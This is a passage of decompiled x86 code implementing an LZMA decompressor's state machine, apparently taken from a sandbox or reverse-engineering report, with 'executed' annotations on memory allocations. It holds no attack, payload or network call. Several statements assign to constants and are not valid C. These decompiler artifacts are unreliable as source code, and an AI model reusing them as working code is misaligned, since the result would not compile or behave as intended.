                          								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                          								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                          								L139:
                          								_t542 =  *(_t621 - 0x84);
                          								while(1) {
                          									 *(_t621 - 0x88) = _t542;
                          									while(1) {
                          										L1:
                          										_t543 =  *(_t621 - 0x88);
                          										if(_t543 > 0x1c) {
                          											break;
                          										}
                          										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
                          											case 0:
                          												if( *(_t621 - 0x6c) == 0) {
                          													goto L170;
                          												}
                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                          												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                          												_t543 =  *( *(_t621 - 0x70));
                          												if(_t543 > 0xe1) {
                          													goto L171;
                          												}
                          												_t547 = _t543 & 0x000000ff;
                          												_push(0x2d);
                          												asm("cdq");
                          												_pop(_t578);
                          												_push(9);
                          												_pop(_t579);
                          												_t617 = _t547 / _t578;
                          												_t549 = _t547 % _t578 & 0x000000ff;
                          												asm("cdq");
                          												_t612 = _t549 % _t579 & 0x000000ff;
                          												 *(_t621 - 0x3c) = _t612;
                          												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                          												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                          												_t620 = (0x300 << _t612 + _t617) + 0x736;
                          												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                          													L10:
                          													if(_t620 == 0) {
                          														L12:
                          														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                          														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                          														goto L15;
                          													} else {
                          														goto L11;
                          													}
                          													do {
                          														L11:
                          														_t620 = _t620 - 1;
                          														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                          													} while (_t620 != 0);
                          													goto L12;
                          												}
                          												if( *(_t621 - 4) != 0) {
                          													GlobalFree( *(_t621 - 4));
                          												}
                          												_t543 = GlobalAlloc(0x40, 0x600); // executed
                          												 *(_t621 - 4) = _t543;
                          												if(_t543 == 0) {
                          													goto L171;
                          												} else {
                          													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                          													goto L10;
                          												}
                          											case 1:
                          												L13:
                          												__eflags =  *(_t621 - 0x6c);
                          												if( *(_t621 - 0x6c) == 0) {
                          													 *(_t621 - 0x88) = 1;
                          													goto L170;
                          												}
                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                          												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                          												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                          												_t45 = _t621 - 0x48;
                          												 *_t45 =  *(_t621 - 0x48) + 1;
                          												__eflags =  *_t45;
                          												L15:
                          												if( *(_t621 - 0x48) < 4) {
                          													goto L13;
                          												}
                          												_t555 =  *(_t621 - 0x40);
                          												if(_t555 ==  *(_t621 - 0x74)) {
                          													L20:
                          													 *(_t621 - 0x48) = 5;
                          													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                          													goto L23;
                          												}
                          												 *(_t621 - 0x74) = _t555;
                          												if( *(_t621 - 8) != 0) {
                          													GlobalFree( *(_t621 - 8));
                          												}
                          												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                          												 *(_t621 - 8) = _t543;
                          												if(_t543 == 0) {
                          													goto L171;
                          												} else {
                          													goto L20;
                          												}
                          											case 2:
                          												L24:
                          												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                          												 *(_t621 - 0x84) = 6;
                          												 *(_t621 - 0x4c) = _t562;
                          												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                          												goto L132;
                          											case 3:
                          												L21:
                          												__eflags =  *(_t621 - 0x6c);
                          												if( *(_t621 - 0x6c) == 0) {
                          													 *(_t621 - 0x88) = 3;
                          													goto L170;
                          												}
                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                          												_t67 = _t621 - 0x70;
                          												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                          												__eflags =  *_t67;
                          												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                          												L23:
                          												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                          												if( *(_t621 - 0x48) != 0) {
                          													goto L21;
                          												}
                          												goto L24;
                          											case 4:
                          												L133:
                          												_t540 =  *_t614;
                          												_t597 = _t540 & 0x0000ffff;
                          												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                          												if( *(_t621 - 0xc) >= _t573) {
                          													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                          													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                          													 *(_t621 - 0x40) = 1;
                          													_t541 = _t540 - (_t540 >> 5);
                          													 *_t614 = _t541;
                          												} else {
                          													 *(_t621 - 0x10) = _t573;
                          													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                          													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                          												}
                          												if( *(_t621 - 0x10) >= 0x1000000) {
                          													goto L139;
                          												}
                          											case 5:
                          												goto L137;
                          											case 6:
                          												__edx = 0;
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x34) = 1;
                          													 *(__ebp - 0x84) = 7;
                          													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          													L132:
                          													 *(_t621 - 0x54) = _t614;
                          													goto L133;
                          												}
                          												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          												__esi =  *(__ebp - 0x60);
                          												__cl = 8;
                          												__cl = 8 -  *(__ebp - 0x3c);
                          												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          												__ecx =  *(__ebp - 0x3c);
                          												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          												__ecx =  *(__ebp - 4);
                          												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          												__eflags =  *(__ebp - 0x38) - 4;
                          												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          												if( *(__ebp - 0x38) >= 4) {
                          													__eflags =  *(__ebp - 0x38) - 0xa;
                          													if( *(__ebp - 0x38) >= 0xa) {
                          														_t98 = __ebp - 0x38;
                          														 *_t98 =  *(__ebp - 0x38) - 6;
                          														__eflags =  *_t98;
                          													} else {
                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          													}
                          												} else {
                          													 *(__ebp - 0x38) = 0;
                          												}
                          												__eflags =  *(__ebp - 0x34) - __edx;
                          												if( *(__ebp - 0x34) == __edx) {
                          													__ebx = 0;
                          													__ebx = 1;
                          													goto L61;
                          												} else {
                          													__eax =  *(__ebp - 0x14);
                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          													__eflags = __eax -  *(__ebp - 0x74);
                          													if(__eax >=  *(__ebp - 0x74)) {
                          														__eax = __eax +  *(__ebp - 0x74);
                          														__eflags = __eax;
                          													}
                          													__ecx =  *(__ebp - 8);
                          													__ebx = 0;
                          													__ebx = 1;
                          													__al =  *((intOrPtr*)(__eax + __ecx));
                          													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          													goto L41;
                          												}
                          											case 7:
                          												goto L0;
                          											case 8:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x84) = 0xa;
                          													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          												} else {
                          													__eax =  *(__ebp - 0x38);
                          													__ecx =  *(__ebp - 4);
                          													__eax =  *(__ebp - 0x38) + 0xf;
                          													 *(__ebp - 0x84) = 9;
                          													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          												}
                          												while(1) {
                          													L132:
                          													 *(_t621 - 0x54) = _t614;
                          													goto L133;
                          												}
                          											case 9:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													goto L89;
                          												}
                          												__eflags =  *(__ebp - 0x60);
                          												if( *(__ebp - 0x60) == 0) {
                          													goto L171;
                          												}
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                          												__eflags = _t258;
                          												0 | _t258 = _t258 + _t258 + 9;
                          												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                          												goto L75;
                          											case 0xa:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x84) = 0xb;
                          													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          													while(1) {
                          														L132:
                          														 *(_t621 - 0x54) = _t614;
                          														goto L133;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x28);
                          												goto L88;
                          											case 0xb:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__ecx =  *(__ebp - 0x24);
                          													__eax =  *(__ebp - 0x20);
                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												} else {
                          													__eax =  *(__ebp - 0x24);
                          												}
                          												__ecx =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												L88:
                          												__ecx =  *(__ebp - 0x2c);
                          												 *(__ebp - 0x2c) = __eax;
                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          												L89:
                          												__eax =  *(__ebp - 4);
                          												 *(__ebp - 0x80) = 0x15;
                          												__eax =  *(__ebp - 4) + 0xa68;
                          												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          												goto L68;
                          											case 0xc:
                          												L99:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xc;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t334 = __ebp - 0x70;
                          												 *_t334 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t334;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												__eax =  *(__ebp - 0x2c);
                          												goto L101;
                          											case 0xd:
                          												L37:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xd;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t122 = __ebp - 0x70;
                          												 *_t122 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t122;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L39:
                          												__eax =  *(__ebp - 0x40);
                          												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          													goto L48;
                          												}
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													goto L54;
                          												}
                          												L41:
                          												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          												__ecx =  *(__ebp - 0x58);
                          												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          												 *(__ebp - 0x48) = __eax;
                          												__eax = __eax + 1;
                          												__eax = __eax << 8;
                          												__eax = __eax + __ebx;
                          												__esi =  *(__ebp - 0x58) + __eax * 2;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edx = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													 *(__ebp - 0x40) = 1;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													__ebx = __ebx + __ebx + 1;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edx;
                          													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L39;
                          												} else {
                          													goto L37;
                          												}
                          											case 0xe:
                          												L46:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xe;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t156 = __ebp - 0x70;
                          												 *_t156 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t156;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												while(1) {
                          													L48:
                          													__eflags = __ebx - 0x100;
                          													if(__ebx >= 0x100) {
                          														break;
                          													}
                          													__eax =  *(__ebp - 0x58);
                          													__edx = __ebx + __ebx;
                          													__ecx =  *(__ebp - 0x10);
                          													__esi = __edx + __eax;
                          													__ecx =  *(__ebp - 0x10) >> 0xb;
                          													__ax =  *__esi;
                          													 *(__ebp - 0x54) = __esi;
                          													__edi = __ax & 0x0000ffff;
                          													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          													__eflags =  *(__ebp - 0xc) - __ecx;
                          													if( *(__ebp - 0xc) >= __ecx) {
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          														__cx = __ax;
                          														_t170 = __edx + 1; // 0x1
                          														__ebx = _t170;
                          														__cx = __ax >> 5;
                          														__eflags = __eax;
                          														 *__esi = __ax;
                          													} else {
                          														 *(__ebp - 0x10) = __ecx;
                          														0x800 = 0x800 - __edi;
                          														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          														__ebx = __ebx + __ebx;
                          														 *__esi = __cx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													 *(__ebp - 0x44) = __ebx;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														continue;
                          													} else {
                          														goto L46;
                          													}
                          												}
                          												L54:
                          												_t173 = __ebp - 0x34;
                          												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          												__eflags =  *_t173;
                          												goto L55;
                          											case 0xf:
                          												L58:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xf;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t203 = __ebp - 0x70;
                          												 *_t203 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t203;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L60:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													L55:
                          													__al =  *(__ebp - 0x44);
                          													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          													goto L56;
                          												}
                          												L61:
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t217 = __edx + 1; // 0x1
                          													__ebx = _t217;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L60;
                          												} else {
                          													goto L58;
                          												}
                          											case 0x10:
                          												L109:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0x10;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t365 = __ebp - 0x70;
                          												 *_t365 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t365;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												goto L111;
                          											case 0x11:
                          												L68:
                          												_t614 =  *(_t621 - 0x58);
                          												 *(_t621 - 0x84) = 0x12;
                          												while(1) {
                          													L132:
                          													 *(_t621 - 0x54) = _t614;
                          													goto L133;
                          												}
                          											case 0x12:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 0x58);
                          													 *(__ebp - 0x84) = 0x13;
                          													__esi =  *(__ebp - 0x58) + 2;
                          													while(1) {
                          														L132:
                          														 *(_t621 - 0x54) = _t614;
                          														goto L133;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x4c);
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          												__ecx =  *(__ebp - 0x58);
                          												__eax =  *(__ebp - 0x4c) << 4;
                          												__eflags = __eax;
                          												__eax =  *(__ebp - 0x58) + __eax + 4;
                          												goto L130;
                          											case 0x13:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													_t469 = __ebp - 0x58;
                          													 *_t469 =  *(__ebp - 0x58) + 0x204;
                          													__eflags =  *_t469;
                          													 *(__ebp - 0x30) = 0x10;
                          													 *(__ebp - 0x40) = 8;
                          													L144:
                          													 *(__ebp - 0x7c) = 0x14;
                          													goto L145;
                          												}
                          												__eax =  *(__ebp - 0x4c);
                          												__ecx =  *(__ebp - 0x58);
                          												__eax =  *(__ebp - 0x4c) << 4;
                          												 *(__ebp - 0x30) = 8;
                          												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          												L130:
                          												 *(__ebp - 0x58) = __eax;
                          												 *(__ebp - 0x40) = 3;
                          												goto L144;
                          											case 0x14:
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          												__eax =  *(__ebp - 0x80);
                          												 *(_t621 - 0x88) = _t542;
                          												goto L1;
                          											case 0x15:
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xb;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          												goto L120;
                          											case 0x16:
                          												__eax =  *(__ebp - 0x30);
                          												__eflags = __eax - 4;
                          												if(__eax >= 4) {
                          													_push(3);
                          													_pop(__eax);
                          												}
                          												__ecx =  *(__ebp - 4);
                          												 *(__ebp - 0x40) = 6;
                          												__eax = __eax << 7;
                          												 *(__ebp - 0x7c) = 0x19;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L145;
                          											case 0x17:
                          												L145:
                          												__eax =  *(__ebp - 0x40);
                          												 *(__ebp - 0x50) = 1;
                          												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          												goto L149;
                          											case 0x18:
                          												L146:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0x18;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t484 = __ebp - 0x70;
                          												 *_t484 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t484;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L148:
                          												_t487 = __ebp - 0x48;
                          												 *_t487 =  *(__ebp - 0x48) - 1;
                          												__eflags =  *_t487;
                          												L149:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													__ecx =  *(__ebp - 0x40);
                          													__ebx =  *(__ebp - 0x50);
                          													0 = 1;
                          													__eax = 1 << __cl;
                          													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          													__eax =  *(__ebp - 0x7c);
                          													 *(__ebp - 0x44) = __ebx;
                          													while(1) {
                          														 *(_t621 - 0x88) = _t542;
                          														goto L1;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x50);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          												__eax =  *(__ebp - 0x58);
                          												__esi = __edx + __eax;
                          												 *(__ebp - 0x54) = __esi;
                          												__ax =  *__esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													__cx = __ax >> 5;
                          													__eax = __eax - __ecx;
                          													__edx = __edx + 1;
                          													__eflags = __edx;
                          													 *__esi = __ax;
                          													 *(__ebp - 0x50) = __edx;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L148;
                          												} else {
                          													goto L146;
                          												}
                          											case 0x19:
                          												__eflags = __ebx - 4;
                          												if(__ebx < 4) {
                          													 *(__ebp - 0x2c) = __ebx;
                          													L119:
                          													_t393 = __ebp - 0x2c;
                          													 *_t393 =  *(__ebp - 0x2c) + 1;
                          													__eflags =  *_t393;
                          													L120:
                          													__eax =  *(__ebp - 0x2c);
                          													__eflags = __eax;
                          													if(__eax == 0) {
                          														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          														goto L170;
                          													}
                          													__eflags = __eax -  *(__ebp - 0x60);
                          													if(__eax >  *(__ebp - 0x60)) {
                          														goto L171;
                          													}
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          													__eax =  *(__ebp - 0x30);
                          													_t400 = __ebp - 0x60;
                          													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          													__eflags =  *_t400;
                          													goto L123;
                          												}
                          												__ecx = __ebx;
                          												__eax = __ebx;
                          												__ecx = __ebx >> 1;
                          												__eax = __ebx & 0x00000001;
                          												__ecx = (__ebx >> 1) - 1;
                          												__al = __al | 0x00000002;
                          												__eax = (__ebx & 0x00000001) << __cl;
                          												__eflags = __ebx - 0xe;
                          												 *(__ebp - 0x2c) = __eax;
                          												if(__ebx >= 0xe) {
                          													__ebx = 0;
                          													 *(__ebp - 0x48) = __ecx;
                          													L102:
                          													__eflags =  *(__ebp - 0x48);
                          													if( *(__ebp - 0x48) <= 0) {
                          														__eax = __eax + __ebx;
                          														 *(__ebp - 0x40) = 4;
                          														 *(__ebp - 0x2c) = __eax;
                          														__eax =  *(__ebp - 4);
                          														__eax =  *(__ebp - 4) + 0x644;
                          														__eflags = __eax;
                          														L108:
                          														__ebx = 0;
                          														 *(__ebp - 0x58) = __eax;
                          														 *(__ebp - 0x50) = 1;
                          														 *(__ebp - 0x44) = 0;
                          														 *(__ebp - 0x48) = 0;
                          														L112:
                          														__eax =  *(__ebp - 0x40);
                          														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          															_t391 = __ebp - 0x2c;
                          															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          															__eflags =  *_t391;
                          															goto L119;
                          														}
                          														__eax =  *(__ebp - 0x50);
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          														__eax =  *(__ebp - 0x58);
                          														__esi = __edi + __eax;
